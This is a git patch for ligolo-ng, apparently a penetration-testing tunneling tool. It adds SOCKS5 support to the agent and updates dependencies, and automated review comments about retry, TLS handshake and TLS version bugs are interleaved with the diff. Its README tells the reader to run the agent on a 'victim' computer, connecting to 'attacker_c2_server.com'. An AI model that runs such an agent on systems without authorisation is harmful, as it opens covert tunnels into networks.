From 091996f6c951d925e093c4cfa30e065b1d8ff10f Mon Sep 17 00:00:00 2001 From: Nicolas Chatelain Date: Fri, 26 Nov 2021 17:35:25 +0100 Subject: [PATCH] Fix compatibility with wintun > 0.14 (#8), add SOCKS5 support (#7), use Go 1.17 --- README.md | 4 +- cmd/agent/main.go | 56 +++++++++++++++++++------- go.mod | 31 ++++++++++++-- go.sum | 18 +++++++++ pkg/agent/neterror/neterror_unix.go | 1 + pkg/proxy/netstack/tun/gvisor.go | 1 + pkg/proxy/netstack/tun/wireguard.go | 1 + pkg/proxy/netstack/tun/wireguard_ep.go | 2 + 8 files changed, 94 insertions(+), 20 deletions(-) diff --git a/README.md b/README.md index ce5b68b..68b68cf 100644 --- a/README.md +++ b/README.md @@ -78,7 +78,7 @@ This allows running tools like *nmap* without the use of *proxychains* (simpler Precompiled binaries (Windows/Linux/macOS) are available on the [Release page](https://github.com/tnpitsecurity/ligolo-ng/releases). ### Building Ligolo-ng -Building *ligolo-ng*: +Building *ligolo-ng* (Go >= 1.17 is required): ```shell $ go build -o agent cmd/agent/main.go @@ -140,6 +140,8 @@ Start the *agent* on your target (victim) computer (no privileges are required!) $ ./agent -connect attacker_c2_server.com:11601 ``` +> If you want to tunnel the connection over a SOCKS5 proxy, you can use the `--socks ip:port` option. You can specify SOCKS credentials using the `--socks-user` and `--socks-pass` arguments. + A session should appear on the *proxy* server. ``` diff --git a/cmd/agent/main.go b/cmd/agent/main.go index 57a72ef..f3651ec 100644 --- a/cmd/agent/main.go +++ b/cmd/agent/main.go @@ -8,6 +8,7 @@ import ( "fmt" "github.com/hashicorp/yamux" "github.com/sirupsen/logrus" + goproxy "golang.org/x/net/proxy" "ligolo-ng/pkg/agent/neterror" "ligolo-ng/pkg/agent/smartping" "ligolo-ng/pkg/protocol" 
@@ -25,11 +26,14 @@ var connTrackID int32 var listenerID int32 func main() { + var tlsConfig tls.Config var ignoreCertificate = flag.Bool("ignore-cert", false, "ignore TLS certificate validation (dangerous), only for debug purposes") var verbose = flag.Bool("v", false, "enable verbose mode") var retry = flag.Bool("retry", false, "auto-retry on error") - - var serverAddr = flag.String("connect", "", "the target domain:port") + var socksProxy = flag.String("socks", "", "socks5 proxy address (ip:port)") + var socksUser = flag.String("socks-user", "", "socks5 username") + var socksPass = flag.String("socks-pass", "", "socks5 password") + var serverAddr = flag.String("connect", "", "the target (domain:port)") flag.Parse() @@ -42,11 +46,38 @@ func main() { if *serverAddr == "" { logrus.Fatal("please, specify the target host user -connect host:port") } - if _, _, err := net.SplitHostPort(*serverAddr); err != nil { - logrus.Fatal("invalid connect address, please using host:port") + host, _, err := net.SplitHostPort(*serverAddr) + if err != nil { + logrus.Fatal("invalid connect address, please use host:port") + } + tlsConfig.ServerName = host + + var conn net.Conn + + if *socksProxy != "" { + if _, _, err := net.SplitHostPort(*socksProxy); err != nil { + logrus.Fatal("invalid socks5 address, please use host:port") + } + + proxyDialer, err := goproxy.SOCKS5("tcp", *socksProxy, &goproxy.Auth{ + User: *socksUser, + Password: *socksPass, + }, goproxy.Direct) + if err != nil { + logrus.Fatalf("socks5 error: %v", err) + } + conn, err = proxyDialer.Dial("tcp", *serverAddr) + if err != nil { + logrus.Fatalf("socks5 dial error: %v", err) + } + } else { + var err error + conn, err = net.Dial("tcp", *serverAddr) + if err != nil { + logrus.Fatalf("dial error: %v", err) + } } - var tlsConfig tls.Config if *ignoreCertificate { logrus.Warn("warning, certificate validation disabled") tlsConfig.InsecureSkipVerify = true 
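Review bot: `var tlsConfig tls.Config`, now declared at the top of main, stays at its zero value apart from `ServerName` and `InsecureSkipVerify`, so the minimum TLS version is left to the toolchain default. The README change in this commit asks for Go >= 1.17, and a client built with Go 1.17 can still negotiate TLS 1.0 and 1.1. Declaring it as `var tlsConfig = tls.Config{MinVersion: tls.VersionTLS12}` pins the floor regardless of compiler version. main's body continues outside this hunk.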
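Review bot: The TCP or SOCKS5 connection is dialed once in this hunk, ahead of the `for` loop shown in the next hunk, so with `-retry` every later `connect(conn, &tlsConfig)` call receives the same `net.Conn` that has already failed. A dial failure also exits through `logrus.Fatalf` and never reaches the retry path, whereas the removed `tls.Dial` ran inside `connect` on each attempt. Moving the dial into a helper that returns its error, calling it inside the loop, and closing the connection once `connect` returns would restore a fresh connection per attempt. main begins and ends outside this hunk; the excerpt below also covers the loop from the next hunk.

```go
// dialServer opens a fresh transport to addr, via the SOCKS5 proxy when socksAddr is set.
func dialServer(addr, socksAddr, user, pass string) (net.Conn, error) {
	if socksAddr == "" {
		return net.Dial("tcp", addr)
	}
	proxyDialer, err := goproxy.SOCKS5("tcp", socksAddr, &goproxy.Auth{User: user, Password: pass}, goproxy.Direct)
	if err != nil {
		return nil, err
	}
	return proxyDialer.Dial("tcp", addr)
}

// … unchanged in main: flag parsing, address validation, tlsConfig setup …

	for {
		conn, err := dialServer(*serverAddr, *socksProxy, *socksUser, *socksPass)
		if err == nil {
			err = connect(conn, &tlsConfig)
			conn.Close() // release the socket before the next attempt
		}
		logrus.Errorf("Connection error: %v", err)
		// … unchanged: retry sleep / exit handling …
```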
@@ -55,9 +86,8 @@ func main() { listenerConntrack = make(map[int32]net.Conn) listenerMap = make(map[int32]net.Listener) - for { - err := connect(*serverAddr, &tlsConfig) + err := connect(conn, &tlsConfig) logrus.Errorf("Connection error: %v", err) if *retry { logrus.Info("Retrying in 5 seconds.") @@ -68,19 +98,15 @@ func main() { } } -func connect(addr string, config *tls.Config) error { - - dialer, err := tls.Dial("tcp", addr, config) - if err != nil { - return err - } +func connect(conn net.Conn, config *tls.Config) error { + tlsConn := tls.Client(conn, config) - yamuxConn, err := yamux.Server(dialer, yamux.DefaultConfig()) + yamuxConn, err := yamux.Server(tlsConn, yamux.DefaultConfig()) if err != nil { return err } - logrus.WithFields(logrus.Fields{"addr": dialer.RemoteAddr()}).Info("Connection established") + logrus.WithFields(logrus.Fields{"addr": tlsConn.RemoteAddr()}).Info("Connection established") for { conn, err := yamuxConn.Accept() diff --git a/go.mod b/go.mod index 45437b3..feb5259 100644 --- a/go.mod +++ b/go.mod @@ -1,6 +1,6 @@ module ligolo-ng -go 1.16 +go 1.17 require ( github.com/AlecAivazis/survey/v2 v2.2.15 
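Review bot: `tls.Client` in `connect` only wraps the connection and, unlike the `tls.Dial` call it replaces, does not run the handshake, so "Connection established" is logged before the server certificate has been verified. As far as this hunk shows, a verification failure would only surface later, from the first read or write made through yamux. Running the handshake right after the wrap keeps certificate errors where they were reported before: `if err := tlsConn.Handshake(); err != nil { return err }`. A deadline set with `conn.SetDeadline` around the handshake would also keep a silent peer from blocking it indefinitely. connect's body continues outside the hunk.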
@@ -9,8 +9,31 @@ require ( github.com/hashicorp/yamux v0.0.0-20210707203944-259a57b3608c github.com/jedib0t/go-pretty/v6 v6.2.4 github.com/sirupsen/logrus v1.8.1 - golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83 - golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect - golang.zx2c4.com/wireguard v0.0.0-20210905140043-2ef39d47540c + golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa + golang.org/x/net v0.0.0-20211111083644-e5c967477495 + golang.zx2c4.com/wintun v0.0.0-20211104114900-415007cec224 // indirect + golang.zx2c4.com/wireguard v0.0.0-20211123210315-387f7c461a16 gvisor.dev/gvisor v0.0.0-20210923032606-0801d469950e ) + +require ( + github.com/desertbit/closer/v3 v3.1.2 // indirect + github.com/desertbit/columnize v2.1.0+incompatible // indirect + github.com/desertbit/go-shlex v0.1.1 // indirect + github.com/desertbit/readline v1.5.1 // indirect + github.com/fatih/color v1.10.0 // indirect + github.com/google/btree v1.0.1 // indirect + github.com/hashicorp/errwrap v1.1.0 // indirect + github.com/hashicorp/go-multierror v1.1.0 // indirect + github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect + github.com/mattn/go-colorable v0.1.8 // indirect + github.com/mattn/go-isatty v0.0.12 // indirect + github.com/mattn/go-runewidth v0.0.9 // indirect + github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b // indirect + golang.org/x/sync v0.0.0-20210220032951-036812b2e83c // indirect + golang.org/x/sys v0.0.0-20211110154304-99a53858aa08 // indirect + golang.org/x/term v0.0.0-20210503060354-a79de5458b56 // indirect + golang.org/x/text v0.3.6 // indirect + golang.org/x/time v0.0.0-20191024005414-555d28b269f0 // indirect + golang.zx2c4.com/go118/netip v0.0.0-20211111135330-a4a02eeacf9d // indirect +) diff --git a/go.sum b/go.sum index 4008e9f..8a6ac3b 100644 --- a/go.sum +++ b/go.sum 
@@ -623,6 +623,8 @@ golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPh golang.org/x/crypto v0.0.0-20201002170205-7f63de1d35b0/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83 h1:/ZScEX8SfEmUGRHs0gxpqteO5nfNW6axyZbBdw9A12g= golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= +golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa h1:idItI2DDfCokpg0N51B2VtiLdJ4vAuXC9fnCb2gACo4= +golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= @@ -702,6 +704,8 @@ golang.org/x/net v0.0.0-20201209123823-ac852fbbde11/go.mod h1:m0MpNAwzfU5UDzcl9v golang.org/x/net v0.0.0-20210119194325-5f4716e94777/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110 h1:qWPm9rbaAMKs8Bq/9LRpbMqxWRVUAQwMI9fVrssnTfw= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20211111083644-e5c967477495 h1:cjxxlQm6d4kYbhpZ2ghvmI8xnq0AG+jXmzrhzfkyu5A= +golang.org/x/net v0.0.0-20211111083644-e5c967477495/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= 
@@ -797,8 +801,14 @@ golang.org/x/sys v0.0.0-20210220050731-9a76102bfb43/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20210305230114-8fe3ee5dd75b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210314195730-07df6a141424/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20211103235746-7861aae1554b h1:1VkfZQv42XQlA/jchYumAnv1UPo6RgF9rJFkTgZIxO4= +golang.org/x/sys v0.0.0-20211103235746-7861aae1554b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20211110154304-99a53858aa08 h1:WecRHqgE09JBkh/584XIE6PMz5KKE/vER4izNUi30AQ= +golang.org/x/sys v0.0.0-20211110154304-99a53858aa08/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210503060354-a79de5458b56 h1:b8jxX3zqjpqb2LklXPzKSGJhzyxCOZSz8ncv8Nv+y7w= 
@@ -812,6 +822,8 @@ golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.4/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.5 h1:i6eZZ+zk0SOf0xgBpEpPD18qWcJda6q1sxt3S0kzyUQ= golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/time v0.0.0-20180412165947-fbb02b2291d2/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= 
@@ -874,8 +886,14 @@ golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8T golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.zx2c4.com/go118/netip v0.0.0-20211111135330-a4a02eeacf9d h1:9+v0G0naRhLPOJEeJOL6NuXTtAHHwmkyZlgQJ0XcQ8I= +golang.zx2c4.com/go118/netip v0.0.0-20211111135330-a4a02eeacf9d/go.mod h1:5yyfuiqVIJ7t+3MqrpTQ+QqRkMWiESiyDvPNvKYCecg= +golang.zx2c4.com/wintun v0.0.0-20211104114900-415007cec224 h1:Ug9qvr1myri/zFN6xL17LSCBGFDnphBBhzmILHsM5TY= +golang.zx2c4.com/wintun v0.0.0-20211104114900-415007cec224/go.mod h1:deeaetjYA+DHMHg+sMSMI58GrEteJUUzzw7en6TJQcI= golang.zx2c4.com/wireguard v0.0.0-20210905140043-2ef39d47540c h1:IsAez/yRA23H/i9A02IHbYnmtVOs7DsP3aVP2cu5SNE= golang.zx2c4.com/wireguard v0.0.0-20210905140043-2ef39d47540c/go.mod h1:laHzsbfMhGSobUmruXWAyMKKHSqvIcrqZJMyHD+/3O8= +golang.zx2c4.com/wireguard v0.0.0-20211123210315-387f7c461a16 h1:SCBV/ayxt56AuC0R8oN5p8Mmc9Llv34tr9VbNlh1kL0= +golang.zx2c4.com/wireguard v0.0.0-20211123210315-387f7c461a16/go.mod h1:TjUWrnD5ATh7bFvmm/ALEJZQ4ivKbETb6pmyj1vUoNI= google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE= google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M= google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg= diff --git a/pkg/agent/neterror/neterror_unix.go b/pkg/agent/neterror/neterror_unix.go index 68e1141..836cae4 100644 --- a/pkg/agent/neterror/neterror_unix.go +++ b/pkg/agent/neterror/neterror_unix.go @@ -1,3 +1,4 @@ +//go:build aix || darwin || dragonfly || freebsd || linux || netbsd || openbsd || solaris // +build aix darwin dragonfly freebsd linux netbsd openbsd solaris package neterror 
diff --git a/pkg/proxy/netstack/tun/gvisor.go b/pkg/proxy/netstack/tun/gvisor.go index 9a9dca0..f3edbdf 100644 --- a/pkg/proxy/netstack/tun/gvisor.go +++ b/pkg/proxy/netstack/tun/gvisor.go @@ -1,3 +1,4 @@ +//go:build !windows // +build !windows package tun diff --git a/pkg/proxy/netstack/tun/wireguard.go b/pkg/proxy/netstack/tun/wireguard.go index 85a6a1a..d3000c3 100644 --- a/pkg/proxy/netstack/tun/wireguard.go +++ b/pkg/proxy/netstack/tun/wireguard.go @@ -1,3 +1,4 @@ +//go:build !linux // +build !linux package tun diff --git a/pkg/proxy/netstack/tun/wireguard_ep.go b/pkg/proxy/netstack/tun/wireguard_ep.go index ac1f594..273200f 100644 --- a/pkg/proxy/netstack/tun/wireguard_ep.go +++ b/pkg/proxy/netstack/tun/wireguard_ep.go @@ -1,4 +1,6 @@ +//go:build !linux // +build !linux + package tun import (